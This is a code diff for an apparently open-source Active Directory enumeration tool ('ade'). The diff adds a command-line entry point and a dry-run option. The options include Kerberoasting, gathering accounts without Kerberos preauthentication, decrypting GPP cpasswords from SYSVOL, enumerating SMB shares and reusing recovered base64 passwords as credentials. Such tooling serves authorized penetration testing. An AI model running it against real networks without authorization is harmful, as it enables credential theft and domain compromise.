@@ -11,6 +11,7 @@ from impacket.dcerpc.v5 import srvs
 import contextlib, argparse, sys, socket, json, re, os, base64
 from Cryptodome.Cipher import AES
 from dns.resolver import NXDOMAIN
+import textwrap
 
 # Thanks SecureAuthCorp for GetNPUsers.py
 # For Kerberos preauthentication
@@ -30,14 +31,14 @@ from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS
 from impacket.ntlm import compute_lmhash, compute_nthash
 from impacket.krb5.asn1 import TGS_REP
 
-from external.bloodhound import BloodHound, resolve_collection_methods
-from external.bloodhound.ad.domain import AD
-from external.bloodhound.ad.authentication import ADAuthentication
+from .bloodhound import BloodHound, resolve_collection_methods
+from .bloodhound.ad.domain import AD
+from .bloodhound.ad.authentication import ADAuthentication
 
 
 class EnumAD():
 
-    def __init__(self, domainController, ldaps, output, enumsmb, bhout, kpre, spnEnum, searchSysvol, domuser=None, computer=None):
+    def __init__(self, domainController, ldaps, output, enumsmb, bhout, kpre, spnEnum, searchSysvol, dryrun, domuser=None):
         self.server = domainController
         self.domuser = domuser
         self.ldaps = ldaps
@@ -70,6 +71,11 @@ class EnumAD():
         self.deletedUsers = []
         self.passwd = False
 
+        # TODO: Figure a good way to go through the code dryrun
+        if dryrun:
+            print(self.server, self.domuser, self.ldaps, self.output, self.bhout, self.kpre, self.spnEnum, self.enumsmb, self.searchSysvol, self.ou_structure, self.dc_string)
+            return
+
         if domuser is not False:
             self.runWithCreds()
         else:
@@ -747,4 +753,72 @@ class EnumAD():
             else:
                 print('[ ' + colored('OK', 'yellow') +' ] User: "{0}" had base64 encoded password of: "{1}" in a property - continuing with these creds'.format(user, pw))
                 print('')
-                return user, pw
\ No newline at end of file
+                return user, pw
+
+
+
+
+def main(args):
+    parser = argparse.ArgumentParser(prog='ade', formatter_class=argparse.RawDescriptionHelpFormatter, description=textwrap.dedent('''
+                ___        __  _            ____  _                __                   ______                    
+               /   | _____/ /_(_)   _____  / __ \(_)_______  _____/ /_____  _______  __/ ____/___  __  ______ ___ 
+              / /| |/ ___/ __/ / | / / _ \/ / / / / ___/ _ \/ ___/ __/ __ \/ ___/ / / / __/ / __ \/ / / / __ `__ \\
+             / ___ / /__/ /_/ /| |/ /  __/ /_/ / / /  /  __/ /__/ /_/ /_/ / /  / /_/ / /___/ / / / /_/ / / / / / /
+            /_/  |_\___/\__/_/ |___/\___/_____/_/_/   \___/\___/\__/\____/_/   \__, /_____/_/ /_/\__,_/_/ /_/ /_/ 
+                                                                              /____/                             
+
+        /*----------------------------------------------------------------------------------------------------------*/
+
+                '''))
+    parser.add_argument('dc', type=str, help='Hostname of the Domain Controller')
+    parser.add_argument('-o', '--out-file', type=str, help='Path to output file. If no path, CWD is assumed (default: None)')
+    parser.add_argument('-u', '--user', type=str, help='Username of the domain user to query with. The username has to be domain name as `user@domain.org`')
+    parser.add_argument('-s', '--secure', help='Try to estalish connection through LDAPS', action='store_true')
+    parser.add_argument('-smb', '--smb', help='Force enumeration of SMB shares on all computer objects fetched', action='store_true')
+    parser.add_argument('-kp', '--kerberos_preauth', help='Attempt to gather users that does not require Kerberos preauthentication', action='store_true')
+    parser.add_argument('-bh', '--bloodhound', help='Output data in the format expected by BloodHound', action='store_true')
+    parser.add_argument('-spn', help='Attempt to get all SPNs and perform Kerberoasting', action='store_true')
+    parser.add_argument('-sysvol', help='Search sysvol for GPOs with cpassword and decrypt it', action='store_true')
+    parser.add_argument('--all', help='Run all checks', action='store_true')
+    parser.add_argument('--no-creds', help='Start without credentials', action='store_true')
+    parser.add_argument('--dry-run', help='Don\'t execute a test but run as if. Used for testing params etc.', action='store_true')
+
+    if len(args) == 1:
+        parser.print_help(sys.stderr)
+        sys.exit(0)
+
+    args = parser.parse_args(args)
+
+    # If theres more than 4 sub'ed (test.test.domain.local) - tough luck sunny boy
+    domainRE = re.compile(r'^((?:[a-zA-Z0-9-.]+)?(?:[a-zA-Z0-9-.]+)?[a-zA-Z0-9-]+\.[a-zA-Z]+)$')
+    userRE = re.compile(r'^([a-zA-Z0-9-\.]+@(?:[a-zA-Z0-9-.]+)?(?:[a-zA-Z0-9-.]+)?[a-zA-Z0-9-]+\.[a-zA-Z0-9-]+)$')
+
+    domainMatch = domainRE.findall(args.dc)
+
+    if not domainMatch:
+        print('[ ' + colored('ERROR', 'red') +' ] Domain flag has to be in the form "domain.local"')
+        sys.exit(1)
+
+    if args.all:
+        args.smb = True
+        args.kerberos_preauth = True
+        args.bloodhound = True
+        args.spn = True
+    if args.no_creds:
+        args.user = False
+    else:
+        userMatch = userRE.findall(args.user)
+        if not userMatch:
+            print('[ ' + colored('ERROR', 'red') +' ] User flag has to be in the form "user@domain.local"')
+            sys.exit(1)
+
+
+    # Boolean flow control flags
+    file_to_write = None
+    if args.out_file:
+        file_to_write = args.out_file
+
+    enumAD = EnumAD(args.dc, args.secure, file_to_write, args.smb, args.bloodhound, args.kerberos_preauth, args.spn, args.sysvol, args.dry_run, args.user)
+
+    # Just print a blank line for output sake
+    print('')
